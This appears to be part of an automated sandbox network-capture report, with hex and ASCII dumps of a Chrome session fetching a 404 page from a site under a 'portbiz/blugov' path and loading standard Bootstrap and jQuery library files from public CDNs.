                                                        2024-12-25 01:23:14 UTC1369INData Raw: 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29
                                                        Data Ascii: f(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 6e 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65
                                                        Data Ascii: nt(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).re
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 5f 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70
                                                        Data Ascii: _DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collap


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449768104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:13 UTC1094OUTGET /portbiz/icons/blugov-left-chevron-dark.svg HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://yungbucksbbq.com/portbiz/css/blugov.css
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:14 UTC1088INHTTP/1.1 404 Not Found
                                                        Date: Wed, 25 Dec 2024 01:23:13 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable
                                                        Pragma: public
                                                        CF-Cache-Status: HIT
                                                        Age: 125556
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CnI6lQniSES7VQMEKssjvhdkcA2UhdB9eAL7ETrMBffH6PzP6MFWIHqSFe8qdACGJ8LwyJRUxQH3ymGn0S%2F8AUxMHQ6a1dTy0rSZkVaNM9RBTwqmrpPgLTGZBmxDU1ADhT23"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75064c5f11727b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1852&rtt_var=714&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1672&delivery_rate=1512169&cwnd=232&unsent_bytes=0&cid=f10382e9308d7d04&ts=1355&x=0"
                                                        2024-12-25 01:23:14 UTC281INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                        2024-12-25 01:23:14 UTC41INData Raw: 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: handle the request.</p></body></html>
                                                        2024-12-25 01:23:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449772104.18.10.2074432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:13 UTC385OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                        Host: stackpath.bootstrapcdn.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:14 UTC967INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:14 GMT
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CDN-PullZone: 252412
                                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                        CDN-RequestCountryCode: US
                                                        Vary: Accept-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31919000
                                                        ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                        Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                        CDN-ProxyVer: 1.04
                                                        CDN-RequestPullSuccess: True
                                                        CDN-RequestPullCode: 200
                                                        CDN-CachedAt: 10/04/2024 02:53:43
                                                        CDN-EdgeStorageId: 1029
                                                        timing-allow-origin: *
                                                        cross-origin-resource-policy: cross-origin
                                                        X-Content-Type-Options: nosniff
                                                        CDN-Status: 200
                                                        CDN-RequestTime: 1
                                                        CDN-RequestId: c6c8a086d090f1d2baac8a7b0c894894
                                                        CDN-Cache: HIT
                                                        CF-Cache-Status: HIT
                                                        Age: 2473399
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Server: cloudflare
                                                        CF-RAY: 8f75064d2c3178e2-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-25 01:23:14 UTC402INData Raw: 37 62 65 63 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                        Data Ascii: 7bec/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66
                                                        Data Ascii: efine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.def
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 6e 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49
                                                        Data Ascii: n,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUI
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75
                                                        Data Ascii: handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;retu
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 2c 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d
                                                        Data Ascii: ,_._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79
                                                        Data Ascii: (t){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQuery
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69
                                                        Data Ascii: this._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibili
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45
                                                        Data Ascii: g=function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTE
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73
                                                        Data Ascii: lement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this
                                                        2024-12-25 01:23:14 UTC1369INData Raw: 29 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69
                                                        Data Ascii: )t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];i


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.449773151.101.2.1374432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:13 UTC363OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                        Host: code.jquery.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:14 UTC611INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 69597
                                                        Server: nginx
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                        ETag: "28feccc0-10fdd"
                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                        Access-Control-Allow-Origin: *
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Age: 649695
                                                        Date: Wed, 25 Dec 2024 01:23:14 GMT
                                                        X-Served-By: cache-lga21984-LGA, cache-nyc-kteb1890020-NYC
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 903, 0
                                                        X-Timer: S1735089794.110269,VS0,VE1
                                                        Vary: Accept-Encoding
